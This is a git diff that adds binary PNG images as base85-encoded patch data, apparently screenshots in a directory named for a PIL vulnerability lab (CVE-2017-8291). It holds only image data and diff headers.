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 literal 0 HcmV?d00001 diff --git a/python/PIL-CVE-2017-8291/02.png b/python/PIL-CVE-2017-8291/02.png new file mode 100644 index 0000000000000000000000000000000000000000..05194a8053468bd928ce0c485cbf193adf9ba8c7 GIT binary patch literal 7229 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 